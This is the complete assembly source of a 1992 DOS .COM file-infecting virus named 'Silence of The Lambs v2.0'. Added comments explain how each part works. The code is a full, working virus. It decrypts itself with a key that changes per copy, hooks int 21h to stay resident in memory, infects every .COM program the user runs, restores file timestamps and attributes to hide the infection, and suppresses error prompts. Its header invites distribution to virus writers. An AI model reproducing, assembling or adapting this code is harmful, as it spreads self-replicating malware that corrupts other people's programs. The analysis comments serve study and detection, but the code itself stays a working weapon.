;                            Silence of The Lambs v2.0
;                (c) -=<: DRE/\MER :>=- of Demoralized Youth 1992
;
;                   THIS FILE IS FOR EDUCATION PURPOSES ONLY!
;                  PERMISSION IS GRANTED TO SPREAD THE SOURCE
;                  TO VIRUS WRITERS *ONLY*. PLEASE DO NOT MAKE
;                  ANY MODIFICATIONS, UNLESS YOU ALSO INCLUDE
;                             THE ORIGINAL SOURCE.
;
;                               Assemble With A86
;

; ---------------------------------------------------------------------
; Entry stub and decryptor (DOS .COM image, loaded at offset 100h).
; Layout: a 2-byte short jump, the 2-byte marker 'DY' at file offset 2,
; then a loop that decrypts `length` bytes in place, starting at
; enc_start. The immediates labelled enc_key and enc_add are overwritten
; by the infect routine (values read from port 40h) each time a copy is
; written, so the encrypted body differs between copies while this stub
; is stored in plaintext.
; Analysis note: the stub bytes and the 'DY' marker at offset 2 are the
; stable part of an infected file; the bytes after enc_start are not.
; ---------------------------------------------------------------------
org     100h
jmp short dummy1
db      'DY'                                    ;marker; infect tests the word at offset 2 of a candidate file
dummy1:
        mov     cx,length                       ;cx = number of encrypted bytes
        mov     si,offset enc_start             ;si -> first encrypted byte
        mov     ah,0                            ;ah = running key (immediate patched per copy)
enc_key         equ $-1                         ;address of the key byte inside the mov above
dummy2:
        sub     byte [si],ah                    ;plain = cipher - key (infect encrypts with add)
        inc     si
        add     ah,0                            ;key += step (immediate patched per copy)
enc_add         equ $-1                         ;address of the step byte inside the add above
        loop    dummy2
; ---------------------------------------------------------------------
; enc_start - body reached once the decryptor loop has finished.
;  1. Residency probe through int 21h AH=2Dh with CH=DH=0FFh.
;  2. If no resident copy answered and the program's memory control
;     block is the last one in the chain, shrink it by pgfsize
;     paragraphs and copy `total` bytes of this image to the freed area.
;  3. Save the int 21h vector into old21 of that copy and point the
;     vector at ni21 there.
;  4. nomore: jump to the address held in the patched immediate `eof`.
; Analysis note: after step 3 the int 21h vector points into a segment
; at the top of conventional memory that no MCB accounts for, and the
; last MCB and the PSP top-of-memory word are pgfsize paragraphs smaller
; than before.
; ---------------------------------------------------------------------
enc_start:
        mov     ah,2Dh                          ;DOS "set time" used as the probe
        mov     ch,0FFh                         ;hour 0FFh is not a valid time
        mov     dx,cx                           ;dh = ch, the pattern ni21 tests for
        int     21h
        cmp     al,0FFh                         ;ni21 answers AL=0; 0FFh is read as "no resident copy"
        jne     nomore

        mov     ax,cs
        dec     ax
        mov     ds,ax                           ;ds = paragraph below the program segment (its MCB)
        cmp     byte [0],'Z'                    ;MCB type 'Z' = last block in the chain
        jne     nomore

        mov     ax,word [3]                     ;MCB block size in paragraphs
        sub     ax,pgfsize
        jc      nomore                          ;block smaller than the space needed
        sub     word [3],pgfsize                ;shrink the block
        sub     word [12h],pgfsize              ;ds:12h is PSP offset 2 (top-of-memory segment)

        mov     es,word [12h]                   ;es = lowered top of memory, destination segment
        mov     si,110h                         ;ds is one paragraph below cs, so ds:110h = cs:100h
        mov     di,100h
        mov     cx,total
        cld
        rep     movsb                           ;copy the image to es:100h

        xor     ax,ax
        mov     ds,ax                           ;ds = 0, interrupt vector table
        mov     si,84h                          ;84h = 4*21h, the int 21h entry
        mov     di,old21
        movsw                                   ;offset  -> es:old21
        movsw                                   ;segment -> es:old21+2

        cli                                     ;no interrupts while the vector is half written
        mov     word [84h+2],es
        mov     word [84h],offset ni21
        sti

nomore:
        push    cs
        push    cs
        pop     es
        pop     ds                              ;ds = es = cs for the host

        mov     bx,0000h                        ;return control to the
eof     equ $-2                                 ;end user: immediate patched by infect to the append stub address
        jmp     bx

; ---------------------------------------------------------------------
; infect - called by ni21 on AX=4B00h, running in the resident segment.
; In:  ASCIIZ file name at cs:0 (copied there by ni21).
; Scratch words in the resident segment: 0F0h = attributes, 0F2h = time,
; 0F4h = date, 0F6h = entry address written into `eof` of the new copy.
; Buffer: `old`, immediately after the resident image.
;
; Files skipped: first byte 'M' or 'Z' (EXE header), marker already
; present at offset 2, or low word of the size outside 0400h..0F9FFh.
;
; Resulting file layout:
;   [0 .. total)          plaintext decryptor stub + re-encrypted body
;   [total .. size)       untouched remainder of the host
;   [size .. size+total)  host's first `total` bytes, XORed with enc_key
;   [size+total .. )      append stub (applen bytes)
; Analysis notes: the file grows by total+applen bytes; attributes and
; the date/time stamp are put back on exit, so neither shows the change.
; The 'DY' marker at offset 2 and the plaintext stub remain comparable
; between copies; the body is re-keyed from port 40h on every write.
; ---------------------------------------------------------------------
xclose:         jmp     close                   ;relay so the short conditional jumps below can reach close

infect:
        push    cs
        pop     ds
        push    cs
        pop     es                              ;ds = es = resident segment

        db      0E4h,40h                        ;encodes "in al,40h": read timer port 40h
        mov     byte [enc_key],al               ;key for this copy

        mov     ax,4300h                        ;use CHMOD to get file attr
        xor     dx,dx                           ;ds:dx = cs:0, the copied file name
        int     21h

        mov     [0F0h],cx                       ;store attr at offset 0F0h of the resident segment

        mov     ax,4301h                        ;clear file attr with CHMOD
        xor     cx,cx
        int     21h

        mov     ax,3D02h                        ;open file for read / write
        int     21h
        xchg    bx,ax                           ;bx = handle for the calls below
        lahf
        push    ax                              ;keep the carry flag returned by the open
        mov     ax,5700h                        ;get file date & time
        int     21h

        mov     [0F2h],cx                       ;time
        mov     [0F4h],dx                       ;date
        pop     ax
        sahf                                    ;restore the open's carry flag
        jc      xclose                          ;open failed

        mov     ah,3Fh                          ;read from file
        mov     cx,total
        mov     dx,old
        int     21h                             ;first `total` bytes of the host -> old

        cmp     byte [old+0],'M'   ;exe MZ ?
        je      xclose
        cmp     byte [old+0],'Z'   ;exe ZM ?
        je      xclose
        cmp     word [old+2],'YD'   ;already infected? (marker word at offset 2)
        je      xclose

        mov     ax,4202h                        ;lseek to EOF
        xor     cx,cx
        xor     dx,dx
        int     21h                             ;ax = low word of the file size

        cmp     ah,0FAh                         ;low size word >= 0FA00h: skip
        jae     xclose
        cmp     ah,4                            ;low size word < 0400h: skip
        jb      xclose

        add     ax,total+100h                   ;in-memory address of the append stub after the write
        mov     word [00F6h],ax

        mov     ah,40h                          ;write to EOF
        mov     cx,total
        mov     dx,old

; XOR the saved host bytes with enc_key before they are written; the
; append stub undoes this with the same key byte at run time.
push    cx
mov     al,byte [enc_key]
mov     si,dx
enc_app:
xor     byte [si],al
inc     si
loop    enc_app
pop     cx

        int     21h                             ;ah=40h, cx and dx still as set above

        mov     ah,40h                          ;write to EOF
        mov     cx,applen
        mov     dx,offset append
        int     21h                             ;append stub follows the saved bytes

        mov     ax,4200h                        ;lseek to beginning of file
        xor     cx,cx
        xor     dx,dx
        int     21h

        push    [eof]                           ;keep the resident copy's own value
        mov     ax,word [00F6h]
        mov     [eof],ax                        ;value the written copy will jump to

        mov     ah,byte [enc_key]               ;ah = starting key
        db      0E4h,40h                        ;encodes "in al,40h": second timer read
        mov     byte [enc_add],al               ;key step for this copy
        mov     dl,al

        mov     si,100h
        mov     di,old

        cld
        mov     cx,offset enc_start-100h
        rep     movsb                           ;decryptor stub copied unencrypted

        mov     cx,length
enc:
        lodsb
        add     al,ah                           ;cipher = plain + key (stub decrypts with sub)
        stosb
        add     ah,dl                           ;key += step
        loop    enc

        mov     ah,40h                          ;write viral code
        mov     dx,old
        mov     cx,total
        int     21h

        pop     [eof]                           ;restore the resident copy's value
close:
        mov     ax,5701h                        ;set file date & time back to the saved values
        mov     cx,[00F2h]
        mov     dx,[00F4h]
        int     21h

        mov     ah,3Eh                          ;close file
        int     21h

        mov     ax,4301h                        ;put the saved attributes back
        mov     cx,[00F0h]
        xor     dx,dx                           ;ds:dx = cs:0, the file name
        int     21h
        ret

; ---------------------------------------------------------------------
; append - stub written at the end of an infected file, directly after
; the XORed copy of the host's first `total` bytes. It is reached through
; the `jmp bx` at nomore. It finds its own address with call/pop, decodes
; the saved bytes back to offset 100h with the key byte at enc_key,
; clears the general registers and returns to 100h, which by then holds
; the host's original code again.
; Analysis note: once this stub has run, the in-memory image at 100h is
; the original host, while the on-disk file still starts with the stub
; and marker.
; ---------------------------------------------------------------------
append:
        call    $+3             ;replace org bytes; pushes the address of the next instruction
        pop     si              ;si = append+3
        sub     si,3+total      ;si -> saved host bytes placed just before this stub
        mov     di,100h
        mov     cx,total
        mov     ah,byte [enc_key]       ;key read once, before the loop overwrites that byte
append_enc:
        lodsb
        xor     al,ah
        stosb
        loop    append_enc

        mov     ax,100h         ;return IP to 100h when done
        push    ax

        sub     ax,ax           ;zero regs
        xor     bx,bx
        and     cx,cx           ;cx is already 0 after the loop; sets flags only
        sub     dx,dx
        xor     si,si
        and     di,di           ;does not clear di; sets flags only
        sub     bp,bp

        ret                     ;pops the 100h pushed above
applen  equ $-offset append     ;stub size in bytes

; ---------------------------------------------------------------------
; ni21 - replacement int 21h handler installed by the code at enc_start.
;  * AH=2Dh with CH=0FFh and DH=CH: residency probe. Answers AL=0 and
;    returns to the caller with iret.
;  * AX=4B00h (load and execute): copies 128 bytes from the caller's
;    DS:DX (the program path) to cs:0, points int 24h at ni24 for the
;    duration, calls infect, then restores the previous int 24h vector.
;  * Every request, including 4B00h once infect has returned, is passed
;    on to the saved original handler through the far jmp at the end,
;    whose 4-byte operand is old21.
; All registers and flags are restored before control is passed on.
; ---------------------------------------------------------------------
ni21:
        pushf
        cmp     ah,2Dh
        jne     Not_Time
        cmp     ch,0FFh
        jne     Not_Time
        cmp     ch,dh
        jne     Not_time

        mov     Al,0                            ;probe answer: a resident copy is present
        popf
        iret
Not_Time:
        cld
        push    ax
        push    bx
        push    cx
        push    dx
        push    si
        push    di
        push    bp
        push    es
        push    ds

; Disabled code kept from the original source (never assembled).
;       cmp     ah,41h
;       jne     Not_Parse
;       mov     ah,3Ch
;       cli
;       add     sp,18
;       sti
;       popf
;       jmp     old21-1

Not_Parse:
        cmp     ax,4B00h
        jne     Not_Exec

        mov     si,dx                           ;caller's ds:dx = program path
        push    cs
        pop     es
        xor     di,di
        mov     cx,128
        rep     movsb                           ;path copied to cs:0 for infect

        mov     ax,3524h                        ;get the current int 24h vector (es:bx)
        int     21h
        push    es
        push    bx

        push    cs
        pop     ds

        mov     ax,2524h                        ;set int 24h to ni24 while the file is handled
        mov     dx,offset ni24
        int     21h

        call    infect

        pop     dx
        pop     ds                              ;ds:dx = previous int 24h vector
        mov     ax,2524h
        int     21h

Not_Exec:
        pop     ds
        pop     es
        pop     bp
        pop     di
        pop     si
        pop     dx
        pop     cx
        pop     bx
        pop     ax
        popf
        jmp     far     0000:0000               ;operand overwritten at install with the original vector
old21   equ $-4                                 ;address of that 4-byte far pointer

; ni24 - int 24h (critical error) handler that ni21 installs around the
; call to infect. It returns AL=0 without any prompt, so a DOS critical
; error raised during the file operations is not shown to the user.
ni24:   mov al,0
        iret

; '$'-terminated text embedded in the image. Nothing in this listing
; references it. It lies after enc_start, so it is stored encrypted in
; infected files and is readable only in the decrypted or resident image.
db      'The Silence Of The Lambs!$'

; Assembly-time constants derived from the end of the image.
total   equ $-100h                      ;size of the whole image in bytes (offset 100h up to here)
pgfsize equ (($*2)/16)+2                ;paragraphs taken from the top of memory: twice the end offset, in 16-byte units, plus 2
length  equ $-offset enc_start          ;number of bytes covered by the decryptor loop

old     equ $                           ;buffer directly after the image; holds file data read and written by infect